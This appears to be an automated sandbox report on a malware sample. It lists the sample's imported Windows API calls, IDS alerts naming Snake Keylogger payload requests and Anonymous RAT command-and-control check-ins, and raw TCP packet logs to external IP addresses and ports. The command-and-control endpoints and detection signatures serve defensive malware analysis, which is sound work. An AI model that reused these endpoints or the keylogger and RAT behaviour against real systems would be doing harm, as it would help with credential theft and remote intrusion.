                                                                                                                                                                    kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                                                                                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                    gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                                                                    user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                    ole32.dllCLSIDFromString
                                                                                                                                                                    kernel32.dllSleep
                                                                                                                                                                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                    ole32.dllCLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                                                                    oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                                                                    comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                                                    shell32.dllShellExecuteExA, ExtractIconExW
                                                                                                                                                                    wininet.dllInternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
                                                                                                                                                                    shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
                                                                                                                                                                    advapi32.dllOpenSCManagerA, CloseServiceHandle
                                                                                                                                                                    wsock32.dllWSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
                                                                                                                                                                    netapi32.dllNetbios

                                                                                                                                                                    Possible Origin

                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                    TurkishTurkey

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                    2024-12-30T04:59:08.131786+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449738142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:08.153938+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449739142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:08.668250+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.44974369.42.215.25280TCP
                                                                                                                                                                    2024-12-30T04:59:09.101725+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449744142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:09.187702+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449746142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:10.329717+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449750142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:11.024552+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449754142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:11.404430+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449756142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:11.886897+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449766118.107.44.21919091TCP
                                                                                                                                                                    2024-12-30T04:59:12.203541+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449759142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:12.394110+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449764142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:13.211852+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449770142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:13.368014+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449772142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:14.033979+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449776142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:14.034144+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449778142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:15.092751+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449782142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:15.117270+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449781142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:16.176639+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449786142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:16.195952+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449787142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T04:59:17.159058+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449794142.250.181.238443TCP
                                                                                                                                                                    2024-12-30T05:00:28.548302+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449785118.107.44.21919091TCP
                                                                                                                                                                    2024-12-30T05:01:45.453960+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.450264118.107.44.21919091TCP
                                                                                                                                                                    2024-12-30T05:02:54.328175+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.450265118.107.44.21919092TCP

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 30, 2024 04:58:58.995712042 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.000727892 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.000802040 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.775223017 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775238991 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775248051 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775258064 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775268078 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775279045 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775288105 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775298119 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775305986 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775321007 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.775393009 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.775393009 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.775393009 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.775393009 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.780222893 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.780235052 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.780251026 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.780258894 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.780271053 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.780280113 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.780308008 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.993017912 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993046999 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993058920 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993071079 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993100882 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.993146896 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.993285894 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993300915 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993313074 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993323088 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993347883 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.993370056 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.993747950 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993758917 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993771076 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993783951 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.993797064 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.993827105 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.994314909 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.994327068 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.994338036 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.994348049 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.994360924 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.994364977 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.994373083 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.994383097 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.994421959 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.995160103 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.995171070 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.995182037 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.995223999 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.995225906 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.995235920 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.995245934 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:58:59.995271921 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:58:59.995281935 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.210942030 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.210954905 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.210972071 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.210980892 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.210990906 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.210999966 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211018085 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.211065054 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.211455107 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211464882 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211474895 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211483955 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211505890 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.211525917 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.211791039 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211844921 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211853981 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211863995 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211873055 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.211896896 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.211926937 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.212466955 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.212476015 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.212486029 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.212492943 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.212502956 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.212508917 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.212512970 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.212524891 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.212527037 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.212536097 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.212546110 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.212570906 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.213378906 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.213388920 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.213397980 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.213407993 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.213418007 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.213427067 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.213433027 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.213437080 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.213452101 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.213457108 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.213473082 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.214265108 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.214314938 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.214315891 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.265603065 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.431888103 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.431900978 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.431910038 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.431917906 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.431927919 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.431931973 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.431938887 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.431981087 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.431994915 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.432007074 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432069063 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432082891 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432092905 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432102919 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432113886 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.432136059 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.432503939 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432521105 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432528973 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432542086 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.432569981 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.432739973 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432760954 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:00.432806969 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.534260988 CET497308853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:00.539122105 CET885349730118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:01.773582935 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:01.778439045 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:01.778779984 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:01.975063086 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:01.975130081 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:01.975310087 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:01.990556002 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:01.990597010 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558094978 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558113098 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558129072 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558140039 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558151960 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558152914 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.558161020 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558172941 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558181047 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558188915 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.558192968 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558202982 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.558222055 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.558243990 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.563081026 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.563091040 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.563102007 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.563112974 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.563122988 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.563178062 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.563431025 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.642452002 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.642498970 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.770891905 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.770905018 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.770957947 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.771039963 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771051884 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771063089 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771074057 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771085024 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771094084 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.771095991 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771145105 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.771764040 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771773100 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771826982 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.771907091 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.771918058 CET885349731118.107.44.219192.168.2.4
